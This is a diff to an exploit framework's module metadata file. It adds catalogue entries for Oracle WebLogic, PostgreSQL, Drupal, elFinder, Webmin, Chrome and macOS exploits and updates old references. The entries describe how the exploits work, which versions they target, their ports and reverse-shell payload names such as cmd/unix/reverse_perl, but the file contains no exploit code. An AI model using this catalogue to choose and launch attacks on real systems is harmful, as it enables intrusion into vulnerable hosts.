+    "path": "/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/bmc_patrol_cmd_exec",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    }
+  },
  "exploit_multi/misc/bmc_server_automation_rscd_nsh_rce": {
    "name": "BMC Server Automation RSCD Agent NSH Remote Command Execution",
    "full_name": "exploit/multi/misc/bmc_server_automation_rscd_nsh_rce",
@@ -67875,6 +69548,173 @@
    "notes": {
    }
  },
+  "exploit_multi/misc/weblogic_deserialize_asyncresponseservice": {
+    "name": "Oracle Weblogic Server Deserialization RCE - AsyncResponseService ",
+    "full_name": "exploit/multi/misc/weblogic_deserialize_asyncresponseservice",
+    "rank": 600,
+    "disclosure_date": "2019-04-23",
+    "type": "exploit",
+    "author": [
+      "Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com>"
+    ],
+    "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n        interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n        to execute code on the vulnerable host.",
+    "references": [
+      "CVE-2017-10271",
+      "CNVD-C-2019-48814",
+      "URL-http://www.cnvd.org.cn/webinfo/show/4999",
+      "URL-https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html",
+      "URL-https://twitter.com/F5Labs/status/1120822404568244224"
+    ],
+    "platform": "Solaris,Unix,Windows",
+    "arch": "",
+    "rport": 7001,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix",
+      "Windows",
+      "Solaris"
+    ],
+    "mod_time": "2019-05-20 13:10:06 +0000",
+    "path": "/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/weblogic_deserialize_asyncresponseservice",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
+  "exploit_multi/misc/weblogic_deserialize_marshalledobject": {
+    "name": "Oracle Weblogic Server Deserialization RCE - MarshalledObject",
+    "full_name": "exploit/multi/misc/weblogic_deserialize_marshalledobject",
+    "rank": 0,
+    "disclosure_date": "2016-07-19",
+    "type": "exploit",
+    "author": [
+      "Andres Rodriguez",
+      "Jacob Baines",
+      "Aaron Soto"
+    ],
+    "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n        interface can send a serialized object (weblogic.corba.utils.MarshalledObject)\n        to the interface to execute code on vulnerable hosts.",
+    "references": [
+      "CVE-2016-3510"
+    ],
+    "platform": "Solaris,Unix,Windows",
+    "arch": "",
+    "rport": 7001,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Unix",
+      "Windows",
+      "Solaris"
+    ],
+    "mod_time": "2019-04-03 09:21:55 +0000",
+    "path": "/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/weblogic_deserialize_marshalledobject",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
+  "exploit_multi/misc/weblogic_deserialize_rawobject": {
+    "name": "Oracle Weblogic Server Deserialization RCE - Raw Object",
+    "full_name": "exploit/multi/misc/weblogic_deserialize_rawobject",
+    "rank": 600,
+    "disclosure_date": "2015-01-28",
+    "type": "exploit",
+    "author": [
+      "Andres Rodriguez",
+      "Stephen Breen",
+      "Aaron Soto"
+    ],
+    "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n        interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)\n        to the interface to execute code on vulnerable hosts.",
+    "references": [
+      "CVE-2015-4852"
+    ],
+    "platform": "Solaris,Unix,Windows",
+    "arch": "",
+    "rport": 7001,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Unix",
+      "Windows",
+      "Solaris"
+    ],
+    "mod_time": "2019-03-26 17:44:52 +0000",
+    "path": "/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/weblogic_deserialize_rawobject",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
+  "exploit_multi/misc/weblogic_deserialize_unicastref": {
+    "name": "Oracle Weblogic Server Deserialization RCE - RMI UnicastRef",
+    "full_name": "exploit/multi/misc/weblogic_deserialize_unicastref",
+    "rank": 600,
+    "disclosure_date": "2017-01-25",
+    "type": "exploit",
+    "author": [
+      "Andres Rodriguez",
+      "Jacob Baines",
+      "Aaron Soto"
+    ],
+    "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n        interface can send a serialized object (sun.rmi.server.UnicastRef)\n        to the interface to execute code on vulnerable hosts.",
+    "references": [
+      "CVE-2017-3248"
+    ],
+    "platform": "Solaris,Unix,Windows",
+    "arch": "",
+    "rport": 7001,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Unix",
+      "Windows",
+      "Solaris"
+    ],
+    "mod_time": "2019-04-01 17:57:28 +0000",
+    "path": "/modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/weblogic_deserialize_unicastref",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_multi/misc/wireshark_lwres_getaddrbyname": {
    "name": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow",
    "full_name": "exploit/multi/misc/wireshark_lwres_getaddrbyname",
@@ -68226,6 +70066,46 @@
    "notes": {
    }
  },
+  "exploit_multi/postgres/postgres_copy_from_program_cmd_exec": {
+    "name": "PostgreSQL COPY FROM PROGRAM Command Execution",
+    "full_name": "exploit/multi/postgres/postgres_copy_from_program_cmd_exec",
+    "rank": 600,
+    "disclosure_date": "2019-03-20",
+    "type": "exploit",
+    "author": [
+      "Jacob Wilkin"
+    ],
+    "description": "Installations running Postgres 9.3 and above have functionality which allows for the superuser\n        and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.\n        This allows arbitrary command execution as though you have console access.\n\n        This module attempts to create a new table, then execute system commands in the context of\n        copying the command output into the table.\n\n        This module should work on all Postgres systems running version 9.3 and above.\n\n        For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl\n\n        For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp\n        Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload\n        or other customised command.",
+    "references": [
+      "CVE-2019-9193",
+      "URL-https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5",
+      "URL-https://www.postgresql.org/docs/9.3/release-9-3.html"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "cmd",
+    "rport": 5432,
+    "autofilter_ports": [
+      5432
+    ],
+    "autofilter_services": [
+      "postgres"
+    ],
+    "targets": [
+      "Automatic",
+      "Unix/OSX/Linux",
+      "Windows - PowerShell (In-Memory)",
+      "Windows (CMD)"
+    ],
+    "mod_time": "2019-04-12 21:25:13 +0000",
+    "path": "/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/postgres/postgres_copy_from_program_cmd_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    }
+  },
  "exploit_multi/postgres/postgres_createlang": {
    "name": "PostgreSQL CREATE LANGUAGE Execution",
    "full_name": "exploit/multi/postgres/postgres_createlang",
@@ -68255,7 +70135,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-04-01 18:58:14 +0000",
    "path": "/modules/exploits/multi/postgres/postgres_createlang.rb",
    "is_install_path": true,
    "ref_name": "multi/postgres/postgres_createlang",
@@ -68593,7 +70473,7 @@
    "references": [
      "CVE-1999-0502"
    ],
-    "platform": "Linux,OSX,Python,Unix",
+    "platform": "BSD,Linux,OSX,Python,Unix",
    "arch": "",
    "rport": 22,
    "autofilter_ports": [
@@ -68611,10 +70491,12 @@
      "Linux aarch64",
      "OSX x86",
      "OSX x64",
+      "BSD x86",
+      "BSD x64",
      "Python",
      "Unix Cmd"
    ],
-    "mod_time": "2018-11-04 09:29:41 +0000",
+    "mod_time": "2019-05-02 20:40:14 +0000",
    "path": "/modules/exploits/multi/ssh/sshexec.rb",
    "is_install_path": true,
    "ref_name": "multi/ssh/sshexec",
@@ -69481,6 +71363,47 @@
    "notes": {
    }
  },
+  "exploit_osx/local/feedback_assistant_root": {
+    "name": "Mac OS X Feedback Assistant Race Condition",
+    "full_name": "exploit/osx/local/feedback_assistant_root",
+    "rank": 600,
+    "disclosure_date": "2019-04-13",
+    "type": "exploit",
+    "author": [
+      "CodeColorist",
+      "timwr"
+    ],
+    "description": "This module exploits a race condition vulnerability in Mac's Feedback Assistant.\n        A successful attempt would result in remote code execution under the context of\n        root.",
+    "references": [
+      "CVE-2019-8565",
+      "URL-https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe",
+      "URL-https://support.apple.com/en-in/HT209600",
+      "URL-https://github.com/ChiChou/sploits"
+    ],
+    "platform": "OSX,Python,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Mac OS X x64 (Native Payload)",
+      "Python payload",
+      "Command payload"
+    ],
+    "mod_time": "2019-05-20 12:43:54 +0000",
+    "path": "/modules/exploits/osx/local/feedback_assistant_root.rb",
+    "is_install_path": true,
+    "ref_name": "osx/local/feedback_assistant_root",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_osx/local/iokit_keyboard_root": {
    "name": "Mac OS X IOKit Keyboard Driver Root Privilege Escalation",
    "full_name": "exploit/osx/local/iokit_keyboard_root",
@@ -70860,7 +72783,7 @@
      "Atlassian Security Team",
      "hdm <x@hdm.io>"
    ],
-    "description": "This module exploits a type confusion vulnerability in Ghostscript that can\n        be exploited to obtain arbitrary command execution. This vulnerability affects\n        Ghostscript versions 9.21 and earlier and can be exploited through libraries\n        such as ImageMagick and Pillow.\n\n        For more recent Ghostscript vectors, please see the following modules:\n          exploit/multi/fileformat/ghostscript_failed_restore",
+    "description": "This module exploits a type confusion vulnerability in Ghostscript that can\n        be exploited to obtain arbitrary command execution. This vulnerability affects\n        Ghostscript versions 9.21 and earlier and can be exploited through libraries\n        such as ImageMagick and Pillow.",
    "references": [
      "CVE-2017-8291",
      "URL-https://bugs.ghostscript.com/show_bug.cgi?id=697808",
@@ -70880,7 +72803,7 @@
    "targets": [
      "EPS file"
    ],
-    "mod_time": "2018-09-17 22:29:20 +0000",
+    "mod_time": "2019-04-24 11:34:42 +0000",
    "path": "/modules/exploits/unix/fileformat/ghostscript_type_confusion.rb",
    "is_install_path": true,
    "ref_name": "unix/fileformat/ghostscript_type_confusion",
@@ -70890,6 +72813,10 @@
    "notes": {
      "AKA": [
        "ghostbutt"
+      ],
+      "RelatedModules": [
+        "exploit/multi/fileformat/ghostscript_failed_restore",
+        "exploit/unix/fileformat/imagemagick_delegate"
      ]
    }
  },
@@ -70906,7 +72833,7 @@
      "wvu <wvu@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "This module exploits a shell command injection in the way \"delegates\"\n        (commands for converting files) are processed in ImageMagick versions\n        <= 7.0.1-0 and <= 6.9.3-9 (legacy).\n\n        Since ImageMagick uses file magic to detect file format, you can create\n        a .png (for example) which is actually a crafted SVG (for example) that\n        triggers the command injection.\n\n        The PostScript (PS) target leverages a Ghostscript -dSAFER bypass\n        (discovered by taviso) to achieve RCE in the Ghostscript delegate.\n        Ghostscript versions 9.18 and later are affected. This target is\n        provided as is and will not be updated to track additional vulns.\n\n        For more recent Ghostscript vectors, please see the following modules:\n          exploit/multi/fileformat/ghostscript_failed_restore\n          exploit/unix/fileformat/ghostscript_type_confusion\n\n        If USE_POPEN is set to true, a |-prefixed command will be used for the\n        exploit. No delegates are involved in this exploitation.",
+    "description": "This module exploits a shell command injection in the way \"delegates\"\n        (commands for converting files) are processed in ImageMagick versions\n        <= 7.0.1-0 and <= 6.9.3-9 (legacy).\n\n        Since ImageMagick uses file magic to detect file format, you can create\n        a .png (for example) which is actually a crafted SVG (for example) that\n        triggers the command injection.\n\n        The PostScript (PS) target leverages a Ghostscript -dSAFER bypass\n        (discovered by taviso) to achieve RCE in the Ghostscript delegate.\n        Ghostscript versions 9.18 and later are affected. This target is\n        provided as is and will not be updated to track additional vulns.\n\n        If USE_POPEN is set to true, a |-prefixed command will be used for the\n        exploit. No delegates are involved in this exploitation.",
    "references": [
      "CVE-2016-3714",
      "CVE-2016-7976",
@@ -70931,7 +72858,7 @@
      "MVG file",
      "PS file"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-04-24 11:34:42 +0000",
    "path": "/modules/exploits/unix/fileformat/imagemagick_delegate.rb",
    "is_install_path": true,
    "ref_name": "unix/fileformat/imagemagick_delegate",
@@ -70941,6 +72868,10 @@
    "notes": {
      "AKA": [
        "ImageTragick"
+      ],
+      "RelatedModules": [
+        "exploit/unix/fileformat/ghostscript_type_confusion",
+        "exploit/multi/fileformat/ghostscript_failed_restore"
      ]
    }
  },
@@ -72496,7 +74427,7 @@
    }
  },
  "exploit_unix/sonicwall/sonicwall_xmlrpc_rce": {
-    "name": "SonicWall Global Management System XMLRPC\n                 set_time_zone Unath RCE",
+    "name": "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",
    "full_name": "exploit/unix/sonicwall/sonicwall_xmlrpc_rce",
    "rank": 600,
    "disclosure_date": "2016-07-22",
@@ -72531,7 +74462,7 @@
    "targets": [
      "SonicWall Global Management System Virtual Appliance"
    ],
-    "mod_time": "2018-07-30 14:06:33 +0000",
+    "mod_time": "2019-03-07 10:29:15 +0000",
    "path": "/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/sonicwall/sonicwall_xmlrpc_rce",
@@ -73473,7 +75404,7 @@
      "Drupal 8.x (Unix In-Memory)",
      "Drupal 8.x (Linux Dropper)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-03-05 18:58:11 +0000",
    "path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/drupal_drupalgeddon2",
@@ -73532,6 +75463,71 @@
    "notes": {
    }
  },
+  "exploit_unix/webapp/drupal_restws_unserialize": {
+    "name": "Drupal RESTful Web Services unserialize() RCE",
+    "full_name": "exploit/unix/webapp/drupal_restws_unserialize",
+    "rank": 300,
+    "disclosure_date": "2019-02-20",
+    "type": "exploit",
+    "author": [
+      "Jasper Mattsson",
+      "Charles Fol",
+      "Rotem Reiss",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a PHP unserialize() vulnerability in Drupal RESTful\n        Web Services by sending a crafted request to the /node REST endpoint.\n\n        As per SA-CORE-2019-003, the initial remediation was to disable POST,\n        PATCH, and PUT, but Ambionics discovered that GET was also vulnerable\n        (albeit cached). Cached nodes can be exploited only once.\n\n        Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of\n        this alternate vector.\n\n        Drupal < 8.5.11 and < 8.6.10 are vulnerable.",
+    "references": [
+      "CVE-2019-6340",
+      "URL-https://www.drupal.org/sa-core-2019-003",
+      "URL-https://www.drupal.org/psa-2019-02-22",
+      "URL-https://www.ambionics.io/blog/drupal8-rce",
+      "URL-https://github.com/ambionics/phpggc",
+      "URL-https://twitter.com/jcran/status/1099206271901798400"
+    ],
+    "platform": "PHP,Unix",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix In-Memory"
+    ],
+    "mod_time": "2019-04-24 11:41:30 +0000",
+    "path": "/modules/exploits/unix/webapp/drupal_restws_unserialize.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/drupal_restws_unserialize",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "SA-CORE-2019-003"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ]
+    }
+  },
  "exploit_unix/webapp/egallery_upload_exec": {
    "name": "EGallery PHP File Upload Vulnerability",
    "full_name": "exploit/unix/webapp/egallery_upload_exec",
@@ -73579,6 +75575,55 @@
    "notes": {
    }
  },
+  "exploit_unix/webapp/elfinder_php_connector_exiftran_cmd_injection": {
+    "name": "elFinder PHP Connector exiftran Command Injection",
+    "full_name": "exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection",
+    "rank": 600,
+    "disclosure_date": "2019-02-26",
+    "type": "exploit",
+    "author": [
+      "Thomas Chauchefoin",
+      "q3rv0",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a command injection vulnerability in elFinder\n        versions prior to 2.1.48.\n\n        The PHP connector component allows unauthenticated users to upload\n        files and perform file modification operations, such as resizing and\n        rotation of an image. The file name of uploaded files is not validated,\n        allowing shell metacharacters.\n\n        When performing image operations on JPEG files, the filename is passed\n        to the `exiftran` utility without appropriate sanitization, causing\n        shell commands in the file name to be executed, resulting in remote\n        command injection as the web server user.\n\n        The PHP connector is not enabled by default.\n\n        The system must have `exiftran` installed and in `$PATH`.\n\n        This module has been tested successfully on elFinder versions 2.1.47,\n        2.1.20 and 2.1.16 on Ubuntu.",
+    "references": [
+      "CVE-2019-9194",
+      "EDB-46481",
+      "URL-https://github.com/Studio-42/elFinder/releases/tag/2.1.48",
+      "URL-https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2019-03-09 04:41:51 +0000",
+    "path": "/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/elfinder_php_connector_exiftran_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_unix/webapp/flashchat_upload_exec": {
    "name": "FlashChat Arbitrary File Upload",
    "full_name": "exploit/unix/webapp/flashchat_upload_exec",
@@ -77279,6 +79324,53 @@
    "notes": {
    }
  },
+  "exploit_unix/webapp/webmin_upload_exec": {
+    "name": "Webmin Upload Authenticated RCE",
+    "full_name": "exploit/unix/webapp/webmin_upload_exec",
+    "rank": 600,
+    "disclosure_date": "2019-01-17",
+    "type": "exploit",
+    "author": [
+      "AkkuS <Özkan Mustafa Akkuş>",
+      "Ziconius <Kris.Anderson@immersivelabs.com>"
+    ],
+    "description": "This module exploits an arbitrary command execution vulnerability in Webmin\n        1.900 and lower versions. Any user authorized to the \"Upload and Download\"\n        module can execute arbitrary commands with root privileges.\n\n        In addition, if the 'Running Processes' (proc) privilege is set the user can\n        accurately determine which directory to upload to. Webmin application files\n        can be written/overwritten, which allows remote code execution. The module\n        has been tested successfully with Webmin 1.900 on Ubuntu v18.04.\n\n        Using GUESSUPLOAD attempts to use a default installation path in order to\n        trigger the exploit.",
+    "references": [
+      "CVE-2019-9624",
+      "EDB-46201",
+      "URL-https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 10000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Webmin <= 1.900"
+    ],
+    "mod_time": "2019-03-21 11:28:45 +0000",
+    "path": "/modules/exploits/unix/webapp/webmin_upload_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/webmin_upload_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_unix/webapp/webtester_exec": {
    "name": "WebTester 5.x Command Execution",
    "full_name": "exploit/unix/webapp/webtester_exec",
@@ -79068,10 +81160,11 @@
    "author": [
      "MC <mc@metasploit.com>"
    ],
-    "description": "Symantec System Center Alert Management System is prone to a\n        remote command-injection vulnerability because the application fails\n        to properly sanitize user-supplied input.",
+    "description": "Symantec System Center Alert Management System is prone to a\n        remote command-injection vulnerability because the application fails\n        to properly sanitize user-supplied input.  This is part of Symantec\n        AntiVirus Corporate Edition 8.0 - 10.1.7.",
    "references": [
      "OSVDB-66807",
      "BID-41959",
+      "CVE-2010-0111",
      "URL-http://www.foofus.net/~spider/code/AMS2_072610.txt"
    ],
    "platform": "Windows",
@@ -79086,7 +81179,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-10 16:42:09 +0000",
    "path": "/modules/exploits/windows/antivirus/ams_hndlrsvc.rb",
    "is_install_path": true,
    "ref_name": "windows/antivirus/ams_hndlrsvc",
@@ -82435,6 +84528,47 @@
    "notes": {
    }
  },
+  "exploit_windows/browser/chrome_filereader_uaf": {
+    "name": "Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86",
+    "full_name": "exploit/windows/browser/chrome_filereader_uaf",
+    "rank": 0,
+    "disclosure_date": "2019-03-21",
+    "type": "exploit",
+    "author": [
+      "Clement Lecigne",
+      "István Kurucsai",
+      "timwr"
+    ],
+    "description": "This exploit takes advantage of a use after free vulnerability in Google\n      Chrome 72.0.3626.119 running on Windows 7 x86.\n        The FileReader.readAsArrayBuffer function can return multiple references to the\n      same ArrayBuffer object, which can be freed and overwritten with sprayed objects.\n      The dangling ArrayBuffer reference can be used to access the sprayed objects,\n      allowing arbitrary memory access from Javascript. This is used to write and\n      execute shellcode in a WebAssembly object.\n        The shellcode is executed within the Chrome sandbox, so you must explicitly\n      disable the sandbox for the payload to be successful.",
+    "references": [
+      "CVE-2019-5786",
+      "URL-https://github.com/exodusintel/CVE-2019-5786",
+      "URL-https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/",
+      "URL-https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/",
+      "URL-https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-05-08 11:20:36 +0000",
+    "path": "/modules/exploits/windows/browser/chrome_filereader_uaf.rb",
+    "is_install_path": true,
+    "ref_name": "windows/browser/chrome_filereader_uaf",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_windows/browser/cisco_anyconnect_exec": {
    "name": "Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",
    "full_name": "exploit/windows/browser/cisco_anyconnect_exec",
@@ -85660,7 +87794,6 @@
      "OSVDB-21987",
      "MSB-MS06-001",
      "BID-16074",
-      "URL-http://www.microsoft.com/technet/security/advisory/912840.mspx",
      "URL-http://wvware.sourceforge.net/caolan/ora-wmf.html"
    ],
    "platform": "Windows",
@@ -85675,7 +87808,7 @@
    "targets": [
      "Windows XP/2003/Vista Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms06_001_wmf_setabortproc",
@@ -85905,8 +88038,7 @@
      "CVE-2007-0038",
      "OSVDB-33629",
      "BID-23194",
-      "MSB-MS07-017",
-      "URL-http://www.microsoft.com/technet/security/advisory/935423.mspx"
+      "MSB-MS07-017"
    ],
    "platform": "Windows",
    "arch": "",
@@ -85925,7 +88057,7 @@
      "Firefox on Windows XP (English)",
      "Firefox on Windows 2003 (English)"
    ],
-    "mod_time": "2017-10-19 19:55:58 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms07_017_ani_loadimage_chunksize",
@@ -86065,8 +88197,7 @@
      "OSVDB-50622",
      "BID-32721",
      "MSB-MS08-078",
-      "URL-http://www.microsoft.com/technet/security/advisory/961051.mspx",
-      "URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
+      "URL-https://web.archive.org/web/20080913064223/http://taossa.com/archive/bh08sotirovdowd.pdf"
    ],
    "platform": "Windows",
    "arch": "",
@@ -86080,7 +88211,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms08_078_xml_corruption.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms08_078_xml_corruption",
@@ -86186,7 +88317,7 @@
      "MSB-MS09-043",
      "URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py",
      "EDB-9163",
-      "URL-http://www.microsoft.com/technet/security/advisory/973472.mspx"
+      "URL-https://web.archive.org/web/20090716143635/http://xeye.us/blog/2009/07/one-0day/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -86200,7 +88331,7 @@
    "targets": [
      "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms09_043_owc_msdso.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms09_043_owc_msdso",
@@ -86226,8 +88357,7 @@
      "CVE-2009-3672",
      "OSVDB-50622",
      "BID-37085",
-      "URL-http://www.microsoft.com/technet/security/advisory/977981.mspx",
-      "URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
+      "URL-https://web.archive.org/web/20090316061713/http://taossa.com/archive/bh08sotirovdowd.pdf"
    ],
    "platform": "Windows",
    "arch": "",
@@ -86241,7 +88371,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms09_072_style_object.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms09_072_style_object",
@@ -86266,8 +88396,7 @@
      "MSB-MS10-002",
      "CVE-2010-0249",
      "OSVDB-61697",
-      "URL-http://www.microsoft.com/technet/security/advisory/979352.mspx",
-      "URL-http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js"
+      "URL-https://web.archive.org/web/20100609073233/http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js"
    ],
    "platform": "Windows",
    "arch": "",
@@ -86281,7 +88410,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms10_002_aurora.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms10_002_aurora",
@@ -86351,9 +88480,8 @@
      "CVE-2010-0806",
      "OSVDB-62810",
      "BID-38615",
-      "URL-http://www.microsoft.com/technet/security/advisory/981374.mspx",
-      "URL-http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/",
-      "URL-http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html",
+      "URL-https://web.archive.org/web/20100929225343/http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/",
+      "URL-https://web.archive.org/web/20120627174253/http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html",
      "MSB-MS10-018"
    ],
    "platform": "Windows",
@@ -86370,7 +88498,7 @@
      "IE 6 SP0-SP2 (onclick)",
      "IE 7.0 (marquee)"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms10_018_ie_behaviors",
@@ -86434,10 +88562,9 @@
    "references": [
      "CVE-2010-0483",
      "OSVDB-62632",
-      "MSB-MS10-023",
-      "URL-http://www.microsoft.com/technet/security/advisory/981169.mspx",
-      "URL-http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx",
-      "URL-http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt"
+      "MSB-MS10-022",
+      "URL-https://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx",
